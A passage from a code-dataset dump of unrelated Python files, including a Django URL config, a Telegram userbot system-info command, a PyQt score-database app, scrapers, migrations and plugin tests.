MC/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"540863469","text":"\"\"\"instagram URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom posting.views import *\nfrom account.views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', home, name=\"home\"),\n path('',detail,name=\"detail\"),#str은 자료형, id= 매개변수로 지정한 이름\n # path('posting/',include('posting.urls')),\n path('account/',include('account.urls')),\n path('new/', new , name = \"new\" ),\n path('create/', create, name= \"create\"),\n path('edit/', edit, name=\"edit\"),\n path('update/',update,name=\"update\"),\n path('feed_create/',feed_create,name=\"feed_create\"),\n path('feed/',feed,name=\"feed\"),\n path('profile/',profile, name=\"profile\"),\n path('delete/', delete , name=\"delete\"),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"instagram/instagram/instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392145296","text":"\nimport os\n\nfrom tests.test_common import *\n\n####################\n## Path constants ##\n####################\nRELAX_OPTIONS = os.path.join(RELAX_PATH, 'options.relax.xml')\nRELAX_SELECT = os.path.join(RELAX_PATH, 'select.relax.xml')\n\n##################\n## Test classes ##\n##################\nclass TestSupport(TestApi):\n\n def test_support_jurisdictions(self):\n \"\"\"/support/jurisdictions served properly.\"\"\"\n res = self.app.get('/support/jurisdictions') \n body = self.makexml(res.body)\n assert relax_validate(RELAX_OPTIONS, body)\n\n def test_javascript(self):\n \"\"\"Test javascript wrapper over /support/jurisdictions.\"\"\"\n res = self.app.get('/support/jurisdictions')\n jsres = self.app.get('/support/jurisdictions.js')\n opts = res.body.strip().split('\\n')\n jsopts = jsres.body.strip().split('\\n')\n assert len(opts) == len(jsopts)\n for i in range(len(opts)):\n assert \"document.write('%s');\" % opts[i] == jsopts[i]\n\n def test_ignore_extra_args(self):\n \"\"\"Extra arguments are ignored.\"\"\"\n res = self.app.get('/support/jurisdictions?foo=bar')\n body = self.makexml(res.body)\n assert relax_validate(RELAX_OPTIONS, body)\n\n ''' NOTE: locale el causes server error; fix in next implementation\n def test_locale(self):\n \"\"\"Test locale parameter.\"\"\"\n for locale in self.data.locales():\n res = self.app.get('/support/jurisdictions?locale=%s' % locale)\n body = self.makexml(res.body)\n assert relax_validate(RELAX_OPTIONS, body)\n '''\n\n def test_select(self):\n \"\"\"Test select parameter.\"\"\"\n res = self.app.get('/support/jurisdictions?select=foo')\n body = res.body.replace('&', '&')\n assert relax_validate(RELAX_SELECT, body)\n","sub_path":"tests/test_support.py","file_name":"test_support.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"212360892","text":"\"\"\"Add TopicSynonym model.\n\nRevision ID: 29b3b8eae57a\nRevises: 27651591b3f5\nCreate Date: 2015-06-01 15:41:56.570502\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '29b3b8eae57a'\ndown_revision = '27651591b3f5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('topic_synonym',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=200), nullable=True),\n sa.Column('pinyin', sa.String(length=200), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('topic_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['topic_id'], ['topic.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('topic_synonym')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/20150601154156_29b3b8eae57a_add_topicsynonym_model.py","file_name":"20150601154156_29b3b8eae57a_add_topicsynonym_model.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"280229576","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom pyrogram import Client, filters\nimport asyncio\nimport requests, os, platform\n\n@Client.on_message(filters.command(['sistem'], ['!','.','/']) & filters.me)\nasync def sistem(client, message):\n # < Başlangıç\n uyku = await message.edit(\"__asyncio.sleep(0.3)__\")\n await asyncio.sleep(0.3)\n \n cevaplanan_mesaj = message.reply_to_message\n if cevaplanan_mesaj is None:\n yanitlanacak_mesaj = message.message_id\n else:\n yanitlanacak_mesaj = cevaplanan_mesaj.message_id\n \n await uyku.delete()\n ilk_mesaj = await message.reply(\"__Bekleyin..__\",\n reply_to_message_id = yanitlanacak_mesaj,\n disable_web_page_preview = True,\n parse_mode = \"Markdown\"\n )\n #------------------------------------------------------------- Başlangıç >\n\n try:\n mesaj = f\"\"\"__Kullanıcı :__ `{os.getlogin()}@{platform.node()}`\n __IP :__ `{requests.get('http://ip.42.pl/raw').text}`\n __OS :__ `{platform.system()} | {platform.release()}`\n __İşlemci :__ `{platform.processor()}`\"\"\"\n await ilk_mesaj.edit(mesaj)\n \n except Exception as hata:\n await ilk_mesaj.edit(f\"__başaramadık abi__\\n\\n\\t`{hata}`\")","sub_path":"kekikUserBot/userBot/botAlani/Eklentiler/sistem.py","file_name":"sistem.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"138988023","text":"\"\"\" Tests running a 1D grid for Abstraction\n\"\"\"\n\ndef run_grid():\n \"\"\" \n \"\"\"\n\n # transition state zmatrinx\n test_zmat = (\n (('N', (None, None, None), (None, None, None)), \n ('H', (0, None, None), ('r1', None, None)), \n ('H', (0, 1, None), ('r2', 'a1', None)), \n ('H', (0, 1, 2), ('r3', 'a2', 'd1')), \n ('X', (3, 0, 1), ('r4', 'a3', 'd2')), \n ('O', (3, 4, 0), ('r5', 'a4', 'd3')), \n ('H', (5, 3, 4), ('r6', 'a5', 'd4'))), \n {'r1': 1.92561, \n 'r2': 1.92561, 'a1': 1.849997, \n 'r3': 1.92561, 'a2': 1.849997, 'd1': 1.961087, \n 'r4': 1.88973, 'a3': 1.5707963267948966, 'd2': 3.141592653589793, \n 'r6': 2.69082, \n 'r5': 111.111, 'a4': 1.4835298641951802, 'd3': 3.141592653589793, \n 'a5': 1.4835298641951802, 'd4': 1.5707963267948966}\n )\n\n # Get the charge and multiplicity of the transition state\n charge = 0 \n mult = 2\n orb_rest = False \n \n # Get submission information\n run_script_str = '''#!/bin/bash\n CWD=$(pwd)\n HOST=b440\n export GAUSS_SCRDIR=/scratch/$USER \n ssh -n $HOST \" module load gaussian/09-e.01 ; \n mkdir -p $GAUSS_SCRDIR ; \n g09 -scrdir=$GAUSS_SCRDIR < $CWD/run.inp > $CWD/run.out \" '''\n prog = 'g09'\n \n # Get level of theory for jobs\n method = 'wb97xd'\n basis = '6-31g*'\n \n # Get the scan coordinates for the Abstraction Reaction\n rmin = 1.1 * 1.88973\n rmax = 1.8 * 1.88973\n nr = 7\n step = (rmax - rmin) / float(nr) \n rsteps = [rmin + step*i for i in range(nr+1)]\n\n # Set scan coordinates\n rts = ['r5']\n\n # Set coordinates to freeze\n dum_coords = ['r4', 'a3', 'd2'] \n\n # Set coordinates to freeze\n froz_coords = rts + dum_coords \n\n # Build a set of grid ts zmats\n grid_ts_zmats = gridopt.build_grid_ts_zmatrices(init_ts_zmat, rts, rsteps)\n\n # Loop over the TS Z-Matrices to run optimizations\n for i, zmat in enumerate(grid_ts_zmats):\n \n # Set run directory for each grid point\n run_dir_str = './GridOpt/'+str(i+1)\n os.mkdir(run_dir_str)\n \n # Call the electronic structure optimization\n INP_STR, OUT_STR = elstruct.run.direct(\n script_str=run_script_str,\n run_dir=run_dir_str,\n input_writer=elstruct.writer.optimization,\n prog=prog,\n method=method,\n basis=basis,\n geom=zmat,\n mult=ts_multiplicity,\n charge=ts_charge,\n orb_restricted=ts_orb_rest,\n frozen_coordinates=froz_coords,\n job_options=(\n elstruct.option.specify(elstruct.Option.Opt.MAXITER_, 60),)\n )\n","sub_path":"tests/test__run_grid.py","file_name":"test__run_grid.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150255011","text":"\n\nimport WebMirror.util.webFunctions as webFunctions\nimport WebMirror.LogBase as LogBase\nimport WebMirror.rules\nimport urllib.parse\n\nclass SiteSyncFetch(LogBase.LoggerMixin):\n\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.wg = webFunctions.WebGetRobust()\n\t\tself.log.info(\"Startup!\")\n\n\n\t@classmethod\n\tdef getGroupSites(cls):\n\t\tinstance = cls()\n\t\treturn instance.go()\n\nclass NovelUpdatesFetch(SiteSyncFetch):\n\tloggerPath = \"Main.NovelUpdatesFetcher\"\n\n\tdef getGroupSubpages(self):\n\t\tret = []\n\n\t\tfor x in range(500000):\n\t\t\turl = 'http://www.novelupdates.com/groupslist/?pg={num}'.format(num=x)\n\n\t\t\tsoup = self.wg.getSoup(url)\n\t\t\tmain = soup.find(\"div\", class_='g-cols')\n\n\t\t\tnew = []\n\t\t\tfor item in main.find_all(\"li\"):\n\t\t\t\tif item.a:\n\t\t\t\t\tnew.append(item.a['href'])\n\t\t\tif new:\n\t\t\t\tret += new\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tself.log.info(\"Found %s group subpage URLs\", len(ret))\n\n\t\treturn ret\n\n\tdef urlFromGroupPage(self, url):\n\t\tsoup = self.wg.getSoup(url)\n\t\tcontent = soup.find('div', class_='w-blog-content')\n\t\tif not content:\n\t\t\traise ValueError(\"Wat?\")\n\t\trows = content.find_all('tr')\n\t\tfor row in rows:\n\t\t\ttds = row.find_all(\"td\")\n\t\t\tif len(tds) == 2:\n\t\t\t\tname, val = tds\n\t\t\t\tif name.get_text() == \"URL\":\n\t\t\t\t\tif val.a:\n\t\t\t\t\t\treturn val.a['href']\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn None\n\t\telse:\n\t\t\traise ValueError(\"Watt?\")\n\n\tdef go(self):\n\t\t# self.urlFromGroupPage('http://www.novelupdates.com/group/anon-empire/')\n\n\t\tret = []\n\t\tsp = self.getGroupSubpages()\n\t\tfor p in sp:\n\t\t\tpg = self.urlFromGroupPage(p)\n\t\t\tif pg:\n\t\t\t\tret.append(pg)\n\t\t\tself.log.info(\"Content page: %s\", pg)\n\t\t# \tpass\n\t\t# \t# print(p)\n\t\treturn ret\n\n\nclass AhoUpdatesFetch(SiteSyncFetch):\n\n\tloggerPath = \"Main.AhoUpdatesFetcher\"\n\n\n\n\tdef getGroupSubpages(self):\n\t\tret = []\n\n\t\tfor x in range(500000):\n\t\t\turl = 'http://aho-updates.com/groups?sort_by=title&sort_order=ASC&page={num}'.format(num=x)\n\t\t\tsoup = self.wg.getSoup(url)\n\n\t\t\tmain = soup.find_all(\"div\", class_='views-row')\n\n\t\t\tnew = 0\n\t\t\tfor item in [tmp for tmp in main if tmp.a]:\n\t\t\t\turl = item.a['href']\n\t\t\t\tif url.startswith(\"/group/\"):\n\t\t\t\t\turl = urllib.parse.urljoin('http://aho-updates.com/', url)\n\t\t\t\t\tif url not in ret:\n\t\t\t\t\t\tret.append(url)\n\t\t\t\t\t\tnew += 1\n\n\t\t\tif new == 0:\n\t\t\t\tbreak\n\n\t\tself.log.info(\"Found %s group subpage URLs\", len(ret))\n\n\t\treturn ret\n\n\tdef urlFromGroupPage(self, url):\n\t\tsoup = self.wg.getSoup(url)\n\t\tcontent = soup.find('div', class_='field-name-field-lnu-grp-website')\n\t\tif not content:\n\t\t\tcontent = soup.find('span', class_='views-field-field-lnu-feed-main-url')\n\t\t\tif not content:\n\t\t\t\traise ValueError(\"Wat?\")\n\t\tif not content.a:\n\t\t\traise ValueError(\"Wattt?\")\n\t\treturn content.a['href']\n\n\tdef go(self):\n\t\t# print(self.urlFromGroupPage('http://aho-updates.com/group/dark-translations'))\n\n\t\tret = []\n\t\tsp = self.getGroupSubpages()\n\t\tfor p in sp:\n\t\t\tpg = self.urlFromGroupPage(p)\n\t\t\tif pg:\n\t\t\t\tret.append(pg)\n\t\t\tself.log.info(\"Content page: %s\", pg)\n\t\treturn ret\n\n\ndef getExistingUrls():\n\trules = WebMirror.rules.load_rules()\n\n\tnetlocs = [item['starturls'] for item in rules if item['starturls']]\n\tnetlocs = [list(set([urllib.parse.urlsplit(item).netloc for item in tmp])) for tmp in netlocs]\n\n\t[item.sort() for item in netlocs]\n\n\tret = []\n\tfor items in netlocs:\n\t\tret += items\n\tprint(\"Have %s existing urls!\" % len(ret))\n\treturn ret\n\n\ndef fetch_other_sites():\n\tv1 = NovelUpdatesFetch.getGroupSites()\n\tv2 = AhoUpdatesFetch.getGroupSites()\n\n\tvals = v1+v2\n\n\thave = getExistingUrls()\n\n\tvals = set(vals)\n\n\tmissed = []\n\tfor val in vals:\n\t\tvloc = urllib.parse.urlsplit(val).netloc\n\t\tif not vloc in have:\n\t\t\tprint(\"New: \", vloc)\n\t\t\tmissed.append(vloc)\n\twith open(\"missed-urls.txt\", \"w\") as fp:\n\t\tfor miss in missed:\n\t\t\tfp.write(\"%s\\n\" % miss)\n\n","sub_path":"WebMirror/SiteSync/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"270005887","text":"def checkMulti(text):\n twice = False\n thrice = False\n letters = set(text)\n for letter in letters:\n if text.count(letter) == 2:\n twice = True\n elif text.count(letter) == 3:\n thrice = True\n return (twice, thrice)\n\ndef compare_ids(id1, id2):\n count = 0\n for a, b in zip(id1, id2):\n if a != b:\n count += 1\n if count > 1:\n return False\n return True\n\ndef find_match(id_list):\n for i, id_val in enumerate(id_list):\n for id_comp in id_list[i + 1:]:\n if compare_ids(id_val, id_comp):\n return ''.join([i for i, j in zip(id_val, id_comp) if i == j])\n\nid_list = []\nwith open(r'day2.txt', 'r') as data:\n twice = 0\n thrice = 0\n\n for line in data.readlines():\n _2, _3 = checkMulti(line)\n twice += _2\n thrice += _3\n if _2 or _3:\n id_list.append(line.rstrip())\n\n print(f'checksum: {twice * thrice}')\n print(f'common letters between 2 correct id\\'s: {find_match(id_list)}')\n\n","sub_path":"2018/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"361394138","text":"import pickle\nimport sys\nfrom PyQt5.QtWidgets import (QWidget, QPushButton,\n QHBoxLayout, QVBoxLayout, QApplication, QLabel,\n QComboBox, QTextEdit, QLineEdit)\nfrom PyQt5.QtCore import Qt\n\n\n\nclass ScoreDB(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n self.dbfilename = 'assignment6.dat'\n self.scoredb = []\n self.readScoreDB()\n self.showScoreDB()\n\n def initUI(self):\n\n # 1번쨰 줄.\n Name = QLabel(\"Name : \") #이름, 나이 점수 라벨을 생성한다.\n Age = QLabel(\"Age : \")\n Score = QLabel(\"Score : \")\n\n self.NameEdit = QLineEdit() #이름, 나이, 점수 텍스트 창을 만든다.\n self.AgeEdit = QLineEdit()\n self.ScoreEdit = QLineEdit()\n\n f1 = QHBoxLayout()\n\n f1.addWidget(Name)\n f1.addWidget(self.NameEdit)\n\n f1.addWidget(Age)\n f1.addWidget(self.AgeEdit)\n\n f1.addWidget(Score)\n f1.addWidget(self.ScoreEdit)\n\n # 2번째 줄.\n Amount = QLabel(\"Amount:\")\n self.AmountEdit = QLineEdit()\n\n self.Combobox = QComboBox() # 선택할 수 있는 박스 생성\n self.Combobox.addItems([\"Score\", \"Name\", \"Age\"]) # 항목 3개 추가 / 단일 항목일 경우는 additem\n\n Key = QLabel(\"Key:\")\n\n f2 = QHBoxLayout()\n f2.addStretch(100)\n\n f2.addWidget(Amount)\n f2.addWidget(self.AmountEdit)\n\n f2.addWidget(Key)\n f2.addWidget(self.Combobox)\n\n\n # 3번째 줄.\n btn2 = QPushButton(\"Add\",self)\n btn2.clicked.connect(self.add_btn_clicked)\n\n btn3 = QPushButton(\"Del\",self)\n btn3.clicked.connect(self.del_btn_clicked)\n\n btn4 = QPushButton(\"Find\",self)\n btn4.clicked.connect(self.find_btn_clicked)\n\n btn5 = QPushButton(\"lnc\",self)\n btn5.clicked.connect(self.inc_btn_clicked)\n\n btn6 = QPushButton(\"show\",self)\n btn6.clicked.connect(self.show_btn_clicked)\n\n f3 = QHBoxLayout()\n f3.addStretch(100)\n\n f3.addWidget(btn2)\n f3.addWidget(btn3)\n f3.addWidget(btn4)\n f3.addWidget(btn5)\n f3.addWidget(btn5)\n f3.addWidget(btn6)\n\n\n # 4번째 줄.\n Result = QLabel(\"Result :\")\n\n self.Text_box = QTextEdit(self)\n self.Text_box.setReadOnly(True) #읽기만 가능 입력 불가\n\n f4 = QVBoxLayout()\n f4.addLayout(f1)\n f4.addLayout(f2)\n f4.addLayout(f3)\n f4.addWidget(Result)\n f4.addWidget(self.Text_box)\n #etc\n\n self.setLayout(f4)\n self.setGeometry(300, 300, 500, 250)\n self.setWindowTitle('Assignment6')\n self.show()\n\n def closeEvent(self, event):\n self.writeScoreDB()\n\n def readScoreDB(self):\n try:\n fH = open(self.dbfilename, 'rb')\n except FileNotFoundError as e:\n self.scoredb = []\n return\n\n try:\n self.scoredb = pickle.load(fH)\n except:\n pass\n else:\n pass\n fH.close()\n\n\n # write the data into person db\n def writeScoreDB(self):\n fH = open(self.dbfilename, 'wb')\n pickle.dump(self.scoredb, fH)\n fH.close()\n\n def showScoreDB(self):\n list = []\n self.Text_box.setPlainText(\"\")\n for p in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n for attr in sorted(p):\n list.append(str(attr) + \"=\" + str(p[attr]))\n self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n list = []\n\n def show_btn_clicked(self):\n list = []\n self.Text_box.setPlainText(\"\")\n keyname = str(self.key_box.currentText())\n for p in sorted(self.scoredb, key = lambda person : person[keyname]):\n for attr in sorted(p):\n list.append(str(attr) + \"=\" + str(p[attr]))\n self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n list = []\n\n\n def add_btn_clicked(self):\n list = []\n self.Text_box.setPlainText(\"\")\n Name = self.NameEdit.text() # 입력한 텍스트 받아오기\n Age = self.AgeEdit.text()\n Score = self.ScoreEdit.text()\n record = {'Name': Name, 'Age': Age, 'Score': Score}\n self.scoredb += [record]\n for p in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n for attr in sorted(p):\n list.append(str(attr) + \"=\" + str(p[attr]))\n self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n list = []\n self.NameEdit.clear()\n self.AgeEdit.clear()\n self.ScoreEdit.clear()\n\n def del_btn_clicked(self):\n list = []\n self.Text_box.setPlainText(\"\")\n for p in self.scoredb:\n if p['Name'] == self.NameEdit.text():\n self.scoredb.remove(p)\n for q in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n for attr in sorted(q):\n list.append(str(attr) + \"=\" + str(q[attr]))\n self.Text_box.append(list[0] + \" \" + list[1] + \" \" + list[2])\n list = []\n\n def find_btn_clicked(self):\n self.Text_box.setPlainText(\"\")\n Name = self.NameEdit.text() # 입력한 텍스트 받아오기\n Age = self.AgeEdit.text()\n Score = self.ScoreEdit.text()\n for i in self.scoredb:\n if i['Name'] == Name :\n self.Text_box.append(\"Age=\"+ \" \"+str(i[\"Age\"])+ \" \"+ \"Name=\"+ \" \"+ str(i[\"Name\"])+ \" \"+ \"Score=\"+ \" \"+str(i[\"Score\"]))\n self.NameEdit.clear()\n self.AgeEdit.clear()\n self.ScoreEdit.clear()\n\n def inc_btn_clicked(self):\n self.Text_box.setPlainText(\"\")\n for s in self.scoredb:\n if s['Name'] == self.NameEdit.text():\n s['Score'] = int(s['Score'])\n s['Score'] = s['Score'] + int(self.AmountEdit.text())\n s['Score'] = str(s['Score'])\n break;\n self.showScoreDB()\n self.NameEdit.clear()\n self.AgeEdit.clear()\n self.ScoreEdit.clear()\n self.AmountEdit.clear()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = ScoreDB()\n sys.exit(app.exec_())\n\n","sub_path":"after/asm 6.py","file_name":"asm 6.py","file_ext":"py","file_size_in_byte":6241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"169151360","text":"\"\"\"Main module.\"\"\"\nimport os\nimport functools\n\n__all__ = [\n 'get', 'mk_shortcut', 'get_float', 'get_int', 'get_bool', 'get_str', 'IS_OK'\n]\n\nIS_OK = ['True', ]\nMISSING_VALUE = object()\n\n\ndef get(name, cast, required=True, default=None, validate=lambda x: None, **kwargs):\n \"\"\"Get name from env.\n\n :param str name: The variable name\n :param callable cast: The function who cast the variable\n :param bool required: Default True\n :param any default: if `required` default is ignored\n :param callable validate: The function who validates the variable\n\n :return: variable\n :rtype: same as `cast` return\n\n :raises ValueError: if `cast` is not a callable\n :raises AttributeError: if `required` and `name` are both undefined\n \"\"\"\n\n if not callable(cast):\n msg = 'cast: {} is not a callable'.format(\n cast.__class__.__name__\n )\n raise ValueError(msg)\n\n value = os.environ.get(name, MISSING_VALUE)\n\n if value is MISSING_VALUE:\n if required:\n raise AttributeError('{} is required'.format(name))\n validate(default)\n return default\n\n casted = cast(value)\n validate(casted)\n return casted\n\n\ndef mk_shortcut(cast):\n \"\"\"ciao.\"\"\"\n return functools.partial(get, cast=cast)\n\n\nget_str = mk_shortcut(str)\nget_str.__name__ = 'get_str'\nget_str.__doc__ = \"\"\"\n Get str from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: str\n \"\"\"\n\nget_float = mk_shortcut(float)\nget_float.__name__ = 'get_float'\nget_float.__doc__ = \"\"\"\n Get float from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: float\n \"\"\"\n\nget_int = mk_shortcut(int)\nget_int.__name__ = 'get_int'\nget_int.__doc__ = \"\"\"\n Get int from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: int\n \"\"\"\n\n\ndef get_bool(name, is_ok=None, **kwargs):\n \"\"\"Get bool from env.\n\n :param str name: The variable name\n :param list(str) is_ok: truthy string list\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: bool\n \"\"\"\n if not is_ok:\n is_ok = IS_OK\n return get(name, lambda x: x in is_ok, **kwargs)\n","sub_path":"envi/envi.py","file_name":"envi.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"236440985","text":"from django.core.management.base import BaseCommand\nfrom hostelAdmin.models import Hostel\nfrom webpage.models import Student, Rating, User\nimport random\nimport csv\n\nclass Command(BaseCommand):\n\n def handle(self,*args,**kwargs):\n with open('data.csv', mode='w', newline='') as rate_file:\n test_data_writer = csv.writer(rate_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n hostels = []\n users = []\n for hostel in Rating.objects.order_by('hostel').values('hostel').distinct() :\n hostel = Hostel.objects.get(id=hostel['hostel']);\n hostels.append(hostel)\n\n for student in Rating.objects.order_by('user').values('user').distinct() :\n user = User.objects.get(id=student['user']);\n users.append(user)\n\n header = []\n header.append('rating')\n for h in hostels:\n header.append(h.id)\n test_data_writer.writerow(header)\n\n for u in users:\n rate=[]\n rate.append(u.id)\n for h in hostels:\n if Rating.objects.filter(hostel=h,user=u).exists():\n r=Rating.objects.filter(hostel=h,user=u).first()\n rate.append(r.rating)\n else:\n r=None\n rate.append('0')\n print(r)\n test_data_writer.writerow(rate)\n","sub_path":"hostelfinder/webpage/management/commands/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"474942544","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Copyright Kitware Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\nimport httmock\nfrom httmock import urlmatch, HTTMock\nimport json\nimport os\nimport sys\nimport time\n\n# Need to set the environment variable before importing girder\ngirder_port = os.environ.get('GIRDER_TEST_PORT', '20200')\nos.environ['GIRDER_PORT'] = girder_port# noqa\n\nfrom tests import base\nfrom girder_client import GirderClient\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../utility')))\nimport import_analyses\n\ndef setUpModule():\n \"\"\"\n Enable the minerva plugin and start the server.\n \"\"\"\n base.enabledPlugins.append('jobs')\n base.enabledPlugins.append('romanesco')\n base.enabledPlugins.append('gravatar')\n base.enabledPlugins.append('minerva')\n base.startServer(False)\n\n\ndef tearDownModule():\n \"\"\"\n Stop the server.\n \"\"\"\n base.stopServer()\n\nclass AnalysisTestCase(base.TestCase):\n \"\"\"\n Tests of the minerva analysis functionality.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Set up the test case with a user\n \"\"\"\n super(AnalysisTestCase, self).setUp()\n\n self._user = self.model('user').createUser(\n 'minervauser', 'password', 'minerva', 'user',\n 'minervauser@example.com')\n\n def testAnalysisUtilityEndpoints(self):\n \"\"\" Test the minerva analysis utility endpoints. \"\"\"\n\n # at first there is no analysis folder or minerva collection\n\n path = '/minerva_analysis/folder'\n response = self.request(path=path, method='GET')\n self.assertStatus(response, 401) # unauthorized\n\n response = self.request(path=path, method='GET', user=self._user)\n self.assertStatusOk(response)\n self.assertEquals(response.json['folder'], None, 'No analysis folder should exist')\n\n # create the analysis folder\n\n response = self.request(path=path, method='POST', user=self._user)\n self.assertStatusOk(response)\n self.assertNotEquals(response.json['folder'], None, 'An analysis folder should exist')\n\n # ensure we can get it\n\n response = self.request(path=path, method='GET', user=self._user)\n self.assertStatusOk(response)\n self.assertNotEquals(response.json['folder'], None, 'An analysis folder should exist')\n\n def testBsveSearchAnalysis(self):\n # create the analysis folder\n path = '/minerva_analysis/folder'\n response = self.request(path=path, method='POST', user=self._user)\n self.assertStatusOk(response)\n analyses_folder = response.json['folder']\n\n # import the bsve analysis\n client = GirderClient('localhost', girder_port)\n client.authenticate('minervauser', 'password')\n\n bsve_analysis_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../analyses/bsve'))\n import_analyses.import_analyses(client, bsve_analysis_path)\n\n path = '/item'\n params = {\n 'folderId': analyses_folder['_id']\n }\n response = self.request(path=path, method='GET', params=params, user=self._user)\n self.assertStatusOk(response)\n self.assertEquals(len(response.json), 1, 'Expecting only one analysis')\n analysis = response.json[0]\n self.assertEquals(analysis['name'], 'bsve search', 'Expecting analysis name to be \"bsve search\"')\n expected_meta = {\n u'minerva': {\n u'analysis_type': u'bsve_search',\n u'analysis_name': u'bsve search',\n u'analysis_id': analysis['_id']\n }\n }\n self.assertEquals(analysis['meta'], expected_meta, 'Unexpected value for meta data')\n\n # create the dataset folder\n path = '/minerva_dataset/folder'\n params = {\n 'userId': self._user['_id'],\n }\n response = self.request(path=path, method='POST', params=params, user=self._user)\n self.assertStatusOk(response)\n\n # mock the calls to bsve search\n @urlmatch(netloc=r'(.*\\.)?beta-search.bsvecosystem.net(.*)$')\n def bsve_mock(url, request):\n if url.path.split('/')[-1] == 'request':\n return httmock.response(200, '12345')\n else:\n pluginTestDir = os.path.dirname(os.path.realpath(__file__))\n filepath = os.path.join(pluginTestDir, 'data', 'bsve_search.json')\n with open(filepath) as bsve_search_file:\n content = {\n 'status': 1,\n 'results': json.load(bsve_search_file)\n }\n headers = {\n 'content-length': len(content),\n 'content-type': 'application/json'\n }\n return httmock.response(200, content, headers, request=request)\n\n with HTTMock(bsve_mock):\n response = self.request(\n path='/minerva_analysis/bsve_search',\n method='POST',\n params={\n 'datasetName': 'test dataset',\n 'bsveSearchParams': '{}'\n },\n user=self._user\n )\n\n # wait for the async job to complete\n searchResultsFinished = False\n count = 0\n while not searchResultsFinished and count < 5:\n # get the dataset and check if it has been updated\n path = '/minerva_dataset/%s/dataset' % str(response.json['dataset_id'])\n response = self.request(\n path=path,\n method='GET',\n user=self._user\n )\n dataset = response.json\n if 'json_row' in dataset:\n searchResultsFinished = True\n else:\n time.sleep(2)\n count += 1\n\n # ensure the first row of results was added to the dataset\n self.assertTrue('json_row' in dataset, 'json_row expected in dataset')\n self.assertTrue('data' in dataset['json_row'], 